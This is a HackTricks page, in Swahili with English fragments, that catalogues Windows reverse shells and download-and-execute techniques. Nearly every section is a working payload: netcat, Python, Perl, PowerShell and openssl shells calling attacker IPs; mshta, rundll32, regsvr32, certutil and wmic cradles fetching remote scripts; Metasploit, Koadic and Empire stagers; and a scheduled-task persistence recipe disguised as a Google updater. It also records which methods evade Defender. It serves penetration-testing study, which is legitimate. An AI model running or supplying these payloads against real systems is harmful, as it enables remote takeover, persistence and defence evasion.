Shells - Windows

Reading time: 16 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Lolbas

The page lolbas-project.github.io is for Windows like https://gtfobins.github.io/ is for linux.
Kwa wazi, there aren't SUID files or sudo privileges in Windows, lakini ni muhimu kujua jinsi baadhi ya binaries zinaweza kutumiwa (au kutumika kinyemela) kufanya aina fulani ya vitendo visivyotarajiwa kama execute arbitrary code.

NC

bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>

NCAT

madhulumiwa

ncat.exe <Attacker_IP> <PORT>  -e "cmd.exe /c (cmd.exe  2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe  2>&1)"

mshambuliaji

ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl

SBD

sbd ni mbadala wa Netcat unaobebeka na salama. Inafanya kazi kwenye mifumo zinazofanana na Unix na Win32. Ikiwa na vipengele kama usimbaji imara, kuendesha programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa upya kwa kuendelea, sbd hutoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika kwa Netcat.

bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSH

Attacker (Kali)

bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Mwanaathiri

bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Mchakato unaofanya wito wa mtandao: powershell.exe
Payload imeandikwa kwenye diski: NO (angalau hakuna sehemu niliyoweza kuipata nikipitia procmon !)

bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Mchakato unaofanya wito wa mtandao: svchost.exe
Payload imeandikwa kwenye diski: WebDAV client local cache

Mstari mmoja:

bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Pata maelezo zaidi kuhusu Powershell Shells mbalimbali mwishoni mwa hati hii

Mshta

bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
bash
mshta http://webserver/payload.hta
bash
mshta \\webdavserver\folder\payload.hta

Mfano wa hta-psh reverse shell (tumia hta ili kupakua na kutekeleza PS backdoor)

xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager hta

mfano wa hta

Kutoka hapa

xml
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

Kutoka hapa

xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Imegunduliwa na defender

Rundll32

Dll hello world example

bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Imegunduliwa na Defender

Rundll32 - sct

From here

xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Imegunduliwa na defender

Regsvr32 – export ya DLL yoyote kwa argument /i (udhibiti wa ufikiaji & kudumu)

Mbali na kupakia scriptlets za mbali (scrobj.dll), regsvr32.exe itapakia DLL ya ndani na kuita exports zake DllRegisterServer/DllUnregisterServer. Custom loaders mara nyingi hutumia hili vibaya kutekeleza code yoyote huku zikijichanganya na LOLBin iliyosainiwa. Vidokezo viwili vya tradecraft vinavyotumika kwa uhalisia:

  • Gatekeeping argument: DLL inatoka isipokuwa switch maalum ipitishwe kwa /i:<arg>, kwa mfano /i:--type=renderer ili kuiga watoto wa renderer wa Chromium. Hii inapunguza utekelezaji usiotarajiwa na kuvuruga sandboxes.
  • Persistence: panga regsvr32 ili ikimbie DLL kwa mode mtulivu + ruhusa za juu na argument /i inayohitajika, ikijiweka kama updater task:
powershell
Register-ScheduledTask \
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
-RunLevel Highest

Tazama pia: variant ya ClickFix clipboard‑to‑PowerShell inayoseti JS loader kisha baadaye inadumu kwa regsvr32. Clipboard Hijacking

Kutoka hapa

html
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

Unaweza kupakua na kutekeleza kwa urahisi sana zombie wa Koadic kwa kutumia stager regsvr

Certutil

Pakua B64dll, uitafsiri kutoka Base64 (decode) na uitekeleze.

bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Pakua B64exe, ibadilishe kutoka Base64 kisha uitekeleze.

bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Imetambuliwa na Defender

Cscript/Wscript

bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Imegunduliwa na defender

PS-Bat

bash
\\webdavserver\folder\batchfile.bat

Mchakato unaofanya mwito wa mtandao: svchost.exe
Payload imeandikwa kwenye diski: WebDAV client local cache

bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
bash
\\10.8.0.3\kali\shell.bat

Imegunduliwa na mlinzi

MSIExec

Mshambuliaji

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Mwenye kuathiriwa:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Imegunduliwa

Wmic

bash
wmic os get /format:"https://webserver/payload.xsl"

Mfano wa faili ya xsl from here:

xml
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Haikutambuliwa

Unaweza kupakua & kuendesha kwa urahisi sana Koadic zombie ukitumia stager wmic

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Unaweza kutumia mbinu hii kuvuka vikwazo vya Application Whitelisting na Powershell.exe. Utapata PS shell.
Shusha tu hii na uitekeleze: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Haigunduliki

CSC

Kusanya msimbo wa C# kwenye kompyuta ya mwathiriwa.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

Unaweza kupakua reverse shell ya msingi ya C# kutoka hapa: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Haijagunduliwa

Regasm/Regsvc

bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Sijawahi kujaribu

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Sijajaribu

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2

Powershell Shells

PS-Nishang

https://github.com/samratashok/nishang

Katika folda ya Shells, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-PowerShellTcp.ps1, tengeneza nakala ya script na uambatishie mwishoni wa faili:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Anza kuhudumia script kwenye seva ya wavuti na uitekeleze kwa upande wa waathiriwa:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender haikutambua kama msimbo hatari (bado, 3/04/2019).

TODO: Angalia nishang shells nyingine

PS-Powercat

https://github.com/besimorhino/powercat

Pakua, anzisha web server, anzisha listener, na uitekeleze upande wa mwathiriwa:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender haikutambui kama msimbo hatari (bado, 3/04/2019).

Chaguzi nyingine zinazotolewa na powercat:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

Tengeneza powershell launcher, uiweke kwenye faili, kisha upakue na uitekeleze.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Imegunduliwa kama malicious code

MSF-Unicorn

https://github.com/trustedsec/unicorn

Unda toleo la powershell la metasploit backdoor ukitumia unicorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Anzisha msfconsole kwa kutumia resource iliyoundwa:

msfconsole -r unicorn.rc

Anzisha web server ikihudumia faili powershell_attack.txt na uendeshe kwenye mashine ya mwathirika:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Imegunduliwa kama msimbo wa hatari

Zaidi

PS>Attack Konsoli ya PS yenye baadhi ya moduli za PS zinazotumika kushambulia zilizopakiwa awali (cyphered)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN Konsoli ya PS yenye baadhi ya moduli za PS zinazotumika kushambulia na proxy detection (IEX)

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks